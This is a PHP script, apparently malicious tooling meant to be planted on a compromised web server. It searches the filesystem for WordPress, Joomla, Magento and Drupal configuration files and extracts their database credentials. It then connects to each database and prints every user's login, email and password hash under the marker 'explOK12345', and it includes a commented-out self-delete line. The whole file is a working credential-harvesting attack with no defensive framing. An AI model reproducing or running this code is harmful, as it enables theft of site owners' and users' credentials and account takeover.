selusr.php

1. <?php
2.  
3. /****find config files****/
4. $rootpath = "";
5. if(isset($_SERVER["DOCUMENT_ROOT"]))
6. {
7. $rootpath = $_SERVER["DOCUMENT_ROOT"];
8. } else
9. {
10. $rootpath = preg_replace('/(htdocs|httpdocs|www)(.*)/','$1',dirname($_SERVER["SCRIPT_FILENAME"]));
11. }
12.  
13.  
14. $pathArr =array();
15. $startPath="";
16. $depth=0;
17. $sep = "/";
18. if (strstr($rootpath,"/"))
19. {
20. $pathArr = explode("/",$rootpath);
21. } elseif (strstr($rootpath,"\\"))
22. {
23. $pathArr = explode("\\",$rootpath);
24. $sep = "\\";
25. }
26. $depth = count($pathArr);
27. if($depth>=2)
28. {
29. $startPath = $pathArr[0];
30. for($i=1;$i<count($pathArr)-1;$i++)
31. {
32. $startPath = $startPath.$sep.$pathArr[$i];
33. $configs=findconfig($startPath,$depth);
34. if(count($configs))
35. {
36. break;
37. }
38. $depth--;
39.  
40. }
41. } else
42. {
43. $startPath = $rootpath;
44. $configs=findconfig($startPath,$depth);
45. }
46.  
47.  
48. if(count($configs)<=0)
49. {
50. $configs=findconfig($rootpath,2);
51. }
52. $addOk = false;
53. if(is_array($configs))
54. {
55. $configs = array_unique($configs);
56. foreach($configs as $config)
57. {
58. try{
59.  
60. $addedUsrs = NULL;
61. $cont = file_get_contents($config);
62. $cmstype = "";
63. if (stripos($config,"wp-config.php"))
64. {
65. $addedUsrs=setWPUser($cont);
66. $cmstype = "WORDPRESS";
67.  
68.  
69. } elseif(stripos($config,"configuration.php"))
70. {
71. $addedUsrs=setJMUser($cont);
72. $cmstype = "JOOMLA";
73.  
74. } elseif(stripos($config,"local.xml"))
75. {
76. $addedUsrs=setMGUser($cont,false);
77. $cmstype = "MAGENTO";
78. } elseif(stripos($config,"env.php"))
79. {
80. $addedUsrs=setMGUser($cont,true);
81. $cmstype = "MAGENTO";
82. } elseif(stripos($config,"settings.php"))
83. {
84. $addedUsrs=setDPUser($cont,true);
85. $cmstype = "DRUPAL";
86. }
87. if(is_array($addedUsrs))
88. {
89. try
90. {
91. $url = $addedUsrs["url"];
92. if(empty($url))
93. {$url=$config;}
94. if(!$addOk)
95. {
96. $addOk = true;
97. echo "explOK12345" ;
98. echo "<br>";
99. }
100. if(is_array($addedUsrs["data"]))
101. {
102. foreach ($addedUsrs["data"] as $usr)
103. {
104. echo $cmstype.":".$url.":".$usr."<br>";
105. }
106. }
107.  
108.  
109. }catch(Exception $e)
110. { echo $e->getMessage();}
111. // echo "<br>";
112.  
113. }
114. }catch(Exception $e)
115. {;}
116.  
117.  
118. }
119.  
120. }
121.  
122. //unlink($_SERVER["SCRIPT_FILENAME"]);
123.  
124. //поиск конфигов
125. function findconfig($source,$depth)
126. {
127.  
128. $source = str_replace('\\', '/', realpath($source));
129. $result=array();
130. try
131. {
132. if (is_dir($source) === true)
133. {
134. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source,RecursiveDirectoryIterator::KEY_AS_PATHNAME), RecursiveIteratorIterator::SELF_FIRST,RecursiveIteratorIterator::CATCH_GET_CHILD);
135. $files->setMaxDepth($depth);
136. foreach ($files as $file => $fileInfo)
137. {
138. try{
139. $file = str_replace('\\', '/', $file);
140. $file2 = $file;
141. if( in_array(substr($file, strrpos($file, '/')+1), array('.', '..')) )
142. continue;
143. $file = realpath($file);
144.  
145. if ((is_file($file) === true)&&(basename($file)=="configuration.php"||basename($file)=="wp-config.php"))
146. {
147. $result[]=$file;
148.  
149. } elseif(is_dir($file)&&strstr($file2,"app/etc"))
150. {
151. //
152. //local.xml
153. if(file_exists(realpath($file."/env.php")))
154. {
155. $result[]= realpath($file."/env.php");
156. }
157. elseif(file_exists(realpath($file."/local.xml")))
158. {
159. $result[]= realpath($file."/local.xml");
160. }
161.  
162. }elseif(is_dir($file)&&strstr($file2,"sites/default"))
163. {
164. //
165. //local.xml
166. if(file_exists(realpath($file."/settings.php")))
167. {
168. $result[]= realpath($file."/settings.php");
169. }
170.  
171. }
172. }catch(Exception $iterex)
173. {
174. ;
175. }
176. }
177. }
178. elseif ((is_file($source) === true)&&(basename($file)=="configuration.php"||basename($file)=="wp-config.php"))
179. {
180.  
181. $result[]=$file;
182. } elseif(is_dir($file)&&stristr($file,"app/etc"))
183. {
184. if(file_exists(realpath($file."/env.php")))
185. {
186. $result[]= realpath($file."/env.php");
187. }
188. elseif(file_exists(realpath($file."/local.xml")))
189. {
190. $result[]= realpath($file."/local.xml");
191. }
192. }elseif(is_dir($file)&&strstr($file2,"sites/default"))
193. {
194. //
195. //local.xml
196. if(file_exists(realpath($file."/settings.php")))
197. {
198. $result[]= realpath($file."/settings.php");
199. }
200.  
201. }
202. } catch (Exception $e) {
203. ;
204. }
205.  
206.  
207.  
208.  
209. return $result;
210. }
211.  
212.  
213. function setWPUser($cont)
214. {
215. $db_name = NULL;
216. $db_user = NULL;
217. $db_pass = NULL;
218. $db_host= NULL;
219. $tbl_preffix="";
220. $db_preffix="";
221. $uri="";
222. preg_match_all('/(define\(\')([^\']+)(\',\s*\')([^\']+)/', $cont, $matches);
223. if(is_array($matches))
224. {
225. for($i=0;$i<count($matches[2]);$i++)
226. {
227. if(stristr($matches[2][$i],"DB_NAME"))
228. {$db_name=$matches[4][$i];}
229. elseif(stristr($matches[2][$i],"db_user"))
230. {$db_user=$matches[4][$i];}
231. elseif(stristr($matches[2][$i],"db_password"))
232. {$db_pass=$matches[4][$i];}
233. elseif(stristr($matches[2][$i],"db_host"))
234. {$db_host=$matches[4][$i];}
235.  
236. }
237. if(!empty($db_name))
238. {
239. preg_match('/(\$table_prefix\s*=\s*\')([^\']+)/', $cont, $mpreffix);
240. if(is_array($mpreffix)&&count($mpreffix)==3)
241. {$tbl_preffix=$mpreffix[2];}
242. if(function_exists('mysql_connect')){
243. if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
244. if(mysql_select_db($db_name,$con_mss))
245. {
246. $result = mysql_query ("SELECT option_value FROM ".$tbl_preffix."options where option_name='siteurl' ", $con_mss);
247. if($result)
248. {
249. $row = mysql_fetch_row($result);
250. if(is_array($row)&&count($row)>0)
251. $uri=trim($row[0]);
252.  
253. }
254.  
255. $ErrorMsg = "";
256. $result2 = mysql_query ("SELECT user_login,user_email,user_pass FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg = mysql_error();
257. if (!$ErrorMsg){
258. if (mysql_num_rows($result2)>0){
259. while ($row = mysql_fetch_row($result2)){
260. $usrArray[] = $row[0].":".$row[1].":".$row[2];
261. }
262. return Array("url"=>$uri,"data"=>$usrArray) ;
263. }
264. }
265.  
266.  
267.  
268. }
269. }
270. }
271. }
272. }
273. }
274.  
275. function setJMUser($cont)
276. {
277. $db_name = NULL;
278. $db_user = NULL;
279. $db_pass = NULL;
280. $db_host= NULL;
281. $tbl_preffix="";
282. $uri="";
283. preg_match_all('/(\$\w+\s*=\s*\')([^\']+)(\'\s*\;)/', $cont, $matches);
284. if(is_array($matches))
285. {
286. for($i=0;$i<count($matches[1]);$i++)
287. {
288. if(stristr($matches[1][$i],"\$db "))
289. {$db_name=$matches[2][$i];}
290. elseif(stristr($matches[1][$i],"\$user "))
291. {$db_user=$matches[2][$i];}
292. elseif(stristr($matches[1][$i],"\$password"))
293. {$db_pass=$matches[2][$i];}
294. elseif(stristr($matches[1][$i],"\$host"))
295. {$db_host=$matches[2][$i];}
296. elseif(stristr($matches[1][$i],"\$dbprefix"))
297. {$tbl_preffix=$matches[2][$i];}
298. elseif(stristr($matches[1][$i],"\$sitename"))
299. {$uri=$matches[2][$i];}
300.  
301. }
302. if(!empty($db_name))
303. {
304. if(function_exists('mysql_connect')){
305. if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
306. if(mysql_select_db($db_name,$con_mss))
307. {
308.  
309. $ErrorMsg = "";
310. $result2 = mysql_query ("SELECT username,email,password FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg = mysql_error();
311. if (!$ErrorMsg){
312. if (mysql_num_rows($result2)>0){
313. while ($row = mysql_fetch_row($result2)){
314. $usrArray[] = $row[0].":".$row[1].":".$row[2];
315. }
316. return Array("url"=>$uri,"data"=>$usrArray) ;
317. }
318. }
319.  
320.  
321.  
322. }
323. }
324. }
325. }
326. }
327. }
328.  
329. function setMGUser($cont,$ismg2)
330. {
331. $db_name = NULL;
332. $db_user = NULL;
333. $db_pass = NULL;
334. $db_host= NULL;
335. $tbl_preffix="";
336. $uri="";
337. $roletbl="";
338.  
339. if(!$ismg2&&stristr($cont,"<?xml version"))
340. {
341. $dbdata = new SimpleXMLElement($cont);
342. $db_name = $dbdata->global->resources->default_setup->connection->dbname;
343. $db_user = $dbdata->global->resources->default_setup->connection->username;
344. $db_pass = $dbdata->global->resources->default_setup->connection->password;
345. $db_host= $dbdata->global->resources->default_setup->connection->host;
346. $tbl_preffix=$dbdata->global->resources->db->table_prefix;
347.  
348. } elseif($ismg2&&stristr($cont,"'host' =>"))
349. {
350. //'host' => 'localhost',
351. preg_match_all('/(\')(\w+)(\'\s*\=\>\s*\')([^\']+)/', $cont, $matches);
352. if(is_array($matches))
353. {
354. for($i=0;$i<count($matches[2]);$i++)
355. {
356. if(stristr($matches[2][$i],"dbname"))
357. {$db_name=$matches[4][$i];}
358. elseif(stristr($matches[2][$i],"username"))
359. {$db_user=$matches[4][$i];}
360. elseif(stristr($matches[2][$i],"password"))
361. {$db_pass=$matches[4][$i];}
362. elseif(stristr($matches[2][$i],"host"))
363. {$db_host=$matches[4][$i];}
364. elseif(stristr($matches[2][$i],"table_prefix"))
365. {$tbl_preffix=$matches[4][$i];}
366.  
367. }
368. }
369.  
370. }
371. if(!is_null($db_name)&&!empty($db_name))
372. {
373. if(function_exists('mysql_connect')){
374. if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
375. if(mysql_select_db($db_name,$con_mss))
376. {
377. $result = mysql_query ("SELECT value FROM ".$tbl_preffix."core_config_data where path='web/unsecure/base_url' ", $con_mss);
378. if($result)
379. {
380. $row = mysql_fetch_row($result);
381. if(is_array($row)&&count($row)>0)
382. $uri=trim($row[0]);
383.  
384. }
385.  
386. $ErrorMsg = "";
387. $result2 = mysql_query ("SELECT username,email,password FROM ".$tbl_preffix."admin_user", $con_mss) or $ErrorMsg = mysql_error();
388. if (!$ErrorMsg){
389. if (mysql_num_rows($result2)>0){
390. while ($row = mysql_fetch_row($result2)){
391. $usrArray[] = $row[0].":".$row[1].":".$row[2];
392. }
393. return Array("url"=>$uri,"data"=>$usrArray) ;
394. }
395. }
396.  
397. }
398. }
399. }
400. }
401.  
402.  
403.  
404.  
405. }
406.  
407. function setDPUser($cont)
408. {
409. $db_name = NULL;
410. $db_user = NULL;
411. $db_pass = NULL;
412. $db_host= NULL;
413. $tbl_preffix="";
414. $uri="";
415. $roletbl="";
416.  
417. if(stristr($cont,"'host' =>"))
418. {
419. //'host' => 'localhost',
420. preg_match_all('/^(\s+\')(\w+)(\'\s*\=\>\s*\')([^\']+)/m', $cont, $matches);
421. if(is_array($matches))
422. {
423. for($i=0;$i<count($matches[2]);$i++)
424. {
425. if(stristr($matches[2][$i],"database"))
426. {$db_name=$matches[4][$i];}
427. elseif(stristr($matches[2][$i],"username"))
428. {$db_user=$matches[4][$i];}
429. elseif(stristr($matches[2][$i],"password"))
430. {$db_pass=$matches[4][$i];}
431. elseif(stristr($matches[2][$i],"host"))
432. {$db_host=$matches[4][$i];}
433. elseif(stristr($matches[2][$i],"prefix"))
434. {$tbl_preffix=$matches[4][$i];}
435.  
436. }
437. }
438.  
439. }
440. if(!is_null($db_name)&&!empty($db_name))
441. {
442. if(function_exists('mysql_connect')){
443. if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
444. if(mysql_select_db($db_name,$con_mss))
445. {
446. $result = mysql_query ("SELECT value FROM ".$tbl_preffix."variable where name='site_name' ", $con_mss);
447. if($result)
448. {
449. $row = mysql_fetch_row($result);
450. if(is_array($row)&&count($row)>0)
451. $uri= unserialize(trim($row[0]));
452.  
453. }
454.  
455. $ErrorMsg = "";
456. $result2 = mysql_query ("SELECT name,mail,pass FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg = mysql_error();
457.  
458. if ($ErrorMsg)
459. {
460. $ErrorMsg = "";
461. $result2 = mysql_query ("SELECT name,mail,pass FROM ".$tbl_preffix."users_field_data", $con_mss) or $ErrorMsg = mysql_error();
462. }
463. if (!$ErrorMsg){
464. if (mysql_num_rows($result2)>0){
465. while ($row = mysql_fetch_row($result2)){
466. $usrArray[] = $row[0].":".$row[1].":".$row[2];
467. }
468. return Array("url"=>$uri,"data"=>$usrArray) ;
469. }
470. }
471.  
472.  
473. }
474. }
475. }
476. }
477. }
478.  
479. ?>